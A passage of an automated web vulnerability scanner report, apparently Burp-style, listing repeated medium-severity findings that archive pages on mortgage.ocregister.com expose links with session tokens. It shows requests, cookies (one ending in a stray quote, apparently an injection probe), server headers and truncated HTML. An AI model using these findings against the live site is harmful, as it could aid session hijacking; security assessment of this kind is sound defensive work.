<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.34. http://mortgage.ocregister.com/2008/03/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.35. http://mortgage.ocregister.com/2008/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.36. http://mortgage.ocregister.com/2008/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.37. http://mortgage.ocregister.com/2008/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.38. http://mortgage.ocregister.com/2008/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.39. http://mortgage.ocregister.com/2008/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.40. http://mortgage.ocregister.com/2008/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 111978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.41. http://mortgage.ocregister.com/2008/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.42. http://mortgage.ocregister.com/2008/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.43. http://mortgage.ocregister.com/2008/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.44. http://mortgage.ocregister.com/2009/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.45. http://mortgage.ocregister.com/2009/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.46. http://mortgage.ocregister.com/2009/03/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.47. http://mortgage.ocregister.com/2009/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.48. http://mortgage.ocregister.com/2009/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.49. http://mortgage.ocregister.com/2009/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.50. http://mortgage.ocregister.com/2009/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.51. http://mortgage.ocregister.com/2009/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.52. http://mortgage.ocregister.com/2009/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.53. http://mortgage.ocregister.com/2009/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

